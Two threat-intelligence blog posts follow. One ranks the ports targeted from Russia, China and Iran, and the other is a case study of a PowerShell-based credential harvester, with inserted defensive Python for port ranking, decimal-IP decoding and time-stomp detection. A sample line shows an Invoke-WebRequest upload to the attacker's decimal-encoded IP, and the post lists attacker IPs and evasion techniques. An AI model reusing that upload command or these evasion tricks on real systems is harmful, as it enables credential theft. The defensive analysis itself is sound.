Your Enemy Can Be Your Best Teacher

Blog | Threat Intelligence Brief

This quote, attributed to the Dalai Lama, inspired our analysts to take a thoughtful approach to monitoring our external nodes. We wanted to answer the question: what are the top 20 ports that the top three cyber threat actor countries are hitting? Could the targeting from countries such as China, Russia, and Iran give us some insight into what they are trying to exploit? So, we analyzed traffic from these countries from 1 May 2020 to 30 June 2020, evaluating over 7 million sessions to identify the top targeted ports from each of these countries.

Key Findings

Our analysis of this data found the following trends:

  1. Russian traffic tends to focus on exploiting remote computing. Port 3389 and the ports near it, along with VNC, were heavily targeted.
  2. Chinese traffic is focused on databases and their infrastructure. MSSQL (1433) was by far the most targeted port, but other database services such as Redis also appear.
  3. Iranian traffic had components of both Russian and Chinese targeting, but also showed significant interest in IoT devices.

Analysis

We realize that not all traffic from these countries is bad, but it is fair to acknowledge these countries do host a significant amount of cyber threats. We hope that by monitoring and observing trends from these locations, we can start to discern potential interests in targeting, as well as assess what services may be at higher risk.
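The ranking described above (top targeted ports per source country, with each port's share of that country's sessions) is easy to reproduce on your own sensor data. The script below is an added example, not PacketWatch's tooling: it assumes session logs have already been reduced to one line per session of the form `COUNTRY DST_PORT`, and the sample lines it embeds are constructed, not the 7 million sessions analyzed in the post. The `rdp_neighbour_ports` helper implements the "ports surrounding 3389" check that the Russia section discusses.

```python
from collections import Counter, defaultdict

# Constructed sample sessions (not PacketWatch data): "source_country dst_port", one per line
SAMPLE_LOG = """\
RU 445
RU 445
RU 23
RU 3389
RU 3390
RU 5900
RU 3391
CN 1433
CN 1433
CN 1433
CN 6379
CN 3306
CN 445
IR 445
IR 1433
IR 9530
IR 23
"""


def parse_sessions(text):
    """Turn 'COUNTRY PORT' lines into (country, port) tuples, skipping blank or malformed lines."""
    sessions = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 2 or not parts[1].isdigit():
            continue
        sessions.append((parts[0].upper(), int(parts[1])))
    return sessions


def top_ports_by_country(sessions, n=20):
    """Return {country: [(port, session_count, percent_of_country_traffic), ...]} ranked by count."""
    per_country = defaultdict(Counter)
    for country, port in sessions:
        per_country[country][port] += 1
    ranked = {}
    for country, counter in per_country.items():
        total = sum(counter.values())
        ranked[country] = [
            (port, count, round(100 * count / total, 1))
            for port, count in counter.most_common(n)
        ]
    return ranked


def rdp_neighbour_ports(ranking, center=3389, radius=10):
    """Ports in a ranking that sit within +/- radius of 3389 (excluding 3389 itself).

    A cluster of these is the pattern the post attributes to hunting for RDP moved
    to a non-standard port; the radius is an assumption, tune it to your data.
    """
    return sorted(port for port, _, _ in ranking
                  if port != center and abs(port - center) <= radius)


if __name__ == "__main__":
    ranking = top_ports_by_country(parse_sessions(SAMPLE_LOG))
    for country, ports in ranking.items():
        print(country, ports)
        print("  near-RDP ports:", rdp_neighbour_ports(ports))
```

Because the share is computed per country rather than over all traffic, the same kind of figure as the "30 to 40% of Chinese traffic on 1433" observation falls out directly, and a week-over-week run of the same function is enough to watch that share move.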

Russia

During this time, we clearly see that the #1 targeted port for Russian traffic was 445. This port is notoriously associated with SMB and the EternalBlue vulnerability. Anecdotally, we consulted some pen tester friends and discovered that EternalBlue is still quite prevalent in the wild. Research on Shodan reveals 1.5 million hits for port 445, and that the US and Russia are the two countries showing the most occurrences of this port being open.

The next top targeted port is Telnet (23) followed by Remote Desktop Protocol (3389). However, as we look at the rest of the top 20, a clear pattern emerges. Several ports surrounding 3389 are also being targeted. Based on our findings, and our knowledge gained from our incident response practice, it appears Russian traffic may be attempting to identify cases where clever systems administrators were trying to hide RDP on non-standard ports.

However, we also see port 5900 in the top 20 as well. This port is associated with VNC (Virtual Network Computing). VNC is a well-known remote access tool, but could obviously be repurposed for malicious purposes, just like RDP.

China

When we first started watching Chinese traffic, we were surprised to see their interest in 1433, MSSQL. While it has always maintained the #1 spot, the percentage of total traffic it represents has varied between 30 and 40% over recent weeks. Other database ports in the top 20 include Redis (6378-6381), MySQL (3306), and the AFS-3 protocol (7001, 7002).

We also witnessed some of the same interests that Russian activity exhibited with targeting on ports like 445 and 3389.

Everything considered, Chinese activity for this period was largely focused on databases. When we consider the breaches that Chinese actors have been indicted for over the last several years (Equifax, OPM), we start to realize their strategic interest in big data can certainly be considered a sustained trend.

Iran

Iranian activity appeared to focus on a combination of the targets we saw exhibited by Russian and Chinese activity, including 445 and 1433. Surprisingly, we noticed a newcomer to the top 10: port 9530. This port is unassigned according to the Internet Assigned Numbers Authority (IANA); however, open source research indicates that a large number of Chinese IoT components, such as devices running Xiongmai firmware, can be accessed via backdoors after hitting port 9530. This is a tactic sometimes referred to as "port knocking."

On a weekly basis, we provide our clients with intelligence on active targeting campaigns that we observe in the wild. During the week of 29 June 2020, we noticed Iranian activity targeting ports 5977 and 4876. Port 4876 is associated with the Tritium CAN Bus Bridge Service, a component associated with vehicles, which typically requires physical access to exploit vulnerabilities.

Conclusion

We found this exercise to be quite eye opening. While we hypothesized that RDP would be of interest, we were surprised to see the variation in ports that Russian traffic was targeting. We also did not expect to find Iranian activity so interested in IoT devices. Chinese activity demonstrated ongoing and unwavering attention to databases.

About PacketWatch

We are threat hunters, investigators, intelligence analysts, and cybersecurity experts with experience in federal law enforcement, national security, and enterprise IT. Leveraging our expertise and our innovative use of technology, we help our clients find security risks that others may miss.

Please visit us at https://packetwatch.com/

Living Off the Land (LOTL): A Case Study

Blog | Threat Intelligence Brief

OVERVIEW

During a recent incident involving LockBit ransomware, we discovered a persistent credential harvester that was hidden as a scheduled task/process. We did a significant amount of investigation before unraveling the clues to what was creating alerts and attempting to beacon out to certain IP addresses in Latvia.

During this investigation, we uncovered a heavy reliance on inherent functions built into Windows that were abused in order to masquerade as other processes, steal passwords, and exfiltrate them out of the organization.

This behavior is often referred to as "Living Off the Land." In other words, no malware was used, just clever use of what is already available within the operating system.

KEY FINDINGS

Latvian Connection

The use of a Latvian VPN provider was a central part of the attacker's infrastructure. It was also referred to throughout the scripts in decimal format: the integer 1484238829 translates to 88[.]119[.]175[.]237 when converted back to dotted-quad notation.
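Decimal-form addresses like the one above are a simple evasion against string-matching on dotted IPs, so an analyst's first step is to convert them and a hunting step is to sweep recovered scripts for any integer that decodes to a routable address. The code below is an added example, not the scripts from the incident and not PacketWatch tooling; the `SAMPLE_SCRIPT` line is a constructed stand-in that only reuses the decimal value quoted in the post, and the eight-to-ten-digit window in `find_decimal_ips` is an assumption chosen to skip small integers that cannot be public addresses.

```python
import ipaddress
import re

# Constructed script fragment (not the attacker's actual script): a decimal-form IPv4 in a URL
SAMPLE_SCRIPT = 'Invoke-WebRequest -Uri "http://1484238829/upload" -Method POST'


def decimal_to_ipv4(value: int) -> str:
    """Convert a 32-bit integer to dotted-quad notation; raises on out-of-range input."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError(f"{value} does not fit in 32 bits")
    return str(ipaddress.IPv4Address(value))


def ipv4_to_decimal(addr: str) -> int:
    """Inverse of decimal_to_ipv4, useful for turning an IOC list into the form a script would use."""
    return int(ipaddress.IPv4Address(addr))


def defang(addr: str) -> str:
    """Write an address as 88[.]119[.]175[.]237 so it cannot be clicked or auto-linked in reports."""
    return addr.replace(".", "[.]")


def find_decimal_ips(text: str):
    """Find integers in text that decode to globally routable IPv4 addresses.

    Returns [(literal, dotted, defanged)]. The 8-10 digit window is an assumption:
    anything shorter decodes into 0.x.x.x space, anything longer cannot be IPv4.
    """
    hits = []
    for match in re.finditer(r"(?<![\w.])(\d{8,10})(?![\w.])", text):
        literal = match.group(1)
        value = int(literal)
        if value > 0xFFFFFFFF:
            continue
        addr = ipaddress.IPv4Address(value)
        if addr.is_global:  # drops private, loopback, reserved and 0.x ranges
            dotted = str(addr)
            hits.append((literal, dotted, defang(dotted)))
    return hits


if __name__ == "__main__":
    print(decimal_to_ipv4(1484238829))
    for literal, dotted, safe in find_decimal_ips(SAMPLE_SCRIPT):
        print(f"{literal} -> {safe}")
```

Note that a decimal address is only one of several equivalent spellings (octal and hex octets, and dotted forms with fewer than four parts, are also accepted by most URL parsers), so a detection that matches on the dotted string alone will miss all of them; matching on the decoded integer does not.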

Renaming PowerShell

In all cases where PowerShell was being used, it was renamed to "modpro.exe."

Picking a Name

The scripts would also create a scheduled task, and name it from one of 9 templates:

Choosing a Birthdate

The newly created tasks would also have their modified dates changed to 485 days in the past. This is a technique known as "time stomping" and would frustrate any attempt to look for newly created scheduled tasks by sorting on modification time.
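A stomped modification time defeats a "sort by last modified" hunt, but it creates its own inconsistency: a task definition file that Task Scheduler wrote fresh should not have a modification time earlier than its creation time, and the backdated value tends to sit a fixed distance (here 485 days) behind the real one. The hunt below is an added example, not PacketWatch's detection logic; it operates on records an analyst would collect from `C:\Windows\System32\Tasks` (file timestamps plus the executable named in the task's `<Exec><Command>`), the `TASKS` list is constructed sample data, and the five-minute tolerance and the `modpro.exe` name list are assumptions.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta, timezone


@dataclass
class TaskRecord:
    name: str                 # scheduled task name
    created: datetime         # file creation time of the task XML under System32\Tasks
    modified: datetime        # file last-modified time of the same XML
    image_name: str           # executable from <Actions><Exec><Command>


# Constructed sample (not records from the incident): one ordinary update task,
# one task whose modified time was pushed 485 days into the past.
NOW = datetime(2020, 7, 1, tzinfo=timezone.utc)
TASKS = [
    TaskRecord("MicrosoftEdgeUpdateTaskMachineCore",
               NOW - timedelta(days=3), NOW - timedelta(days=3), "MicrosoftEdgeUpdate.exe"),
    TaskRecord("OneDrive Standalone Update Task",
               NOW - timedelta(days=2), NOW - timedelta(days=487), "modpro.exe"),
]

# Assumed list of on-disk names observed standing in for powershell.exe
RENAMED_INTERPRETERS = {"modpro.exe"}


def stomped_tasks(tasks, tolerance=timedelta(minutes=5)):
    """Tasks whose 'modified' timestamp predates their creation timestamp.

    A freshly written task file cannot legitimately be modified before it exists;
    the tolerance absorbs clock jitter. Copied files can also show this pattern,
    so confirm hits against the task's registration source before acting on them.
    """
    return [t.name for t in tasks if t.created - t.modified > tolerance]


def stomp_offset_days(task):
    """How far back the modified time was pushed relative to creation, in whole days."""
    return (task.created - task.modified).days


def renamed_interpreter_tasks(tasks, names=RENAMED_INTERPRETERS):
    """Tasks that launch an executable known to be a renamed PowerShell."""
    return [t.name for t in tasks if t.image_name.lower() in names]


if __name__ == "__main__":
    for t in TASKS:
        flags = []
        if t.name in stomped_tasks(TASKS):
            flags.append(f"time-stomped by {stomp_offset_days(t)} days")
        if t.name in renamed_interpreter_tasks(TASKS):
            flags.append(f"runs {t.image_name}")
        print(t.name, "->", "; ".join(flags) or "no findings")
```

In practice the renamed-binary check should not rely on a name list alone: the PE version resource of `modpro.exe` still carries `powershell.exe` as its OriginalFilename, and comparing that field against the on-disk name catches renames you have not seen before.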

Conclusion

This malware-less attack was quite sophisticated and complex to unravel. The multiple layers involved and numerous steps associated are all included in our full report. This report also includes references to the different techniques employed and the ATT&CK framework.

IOCs

88.119.175[.]237

88.119.175[.]81

More Information

Please see the full report for in-depth details.
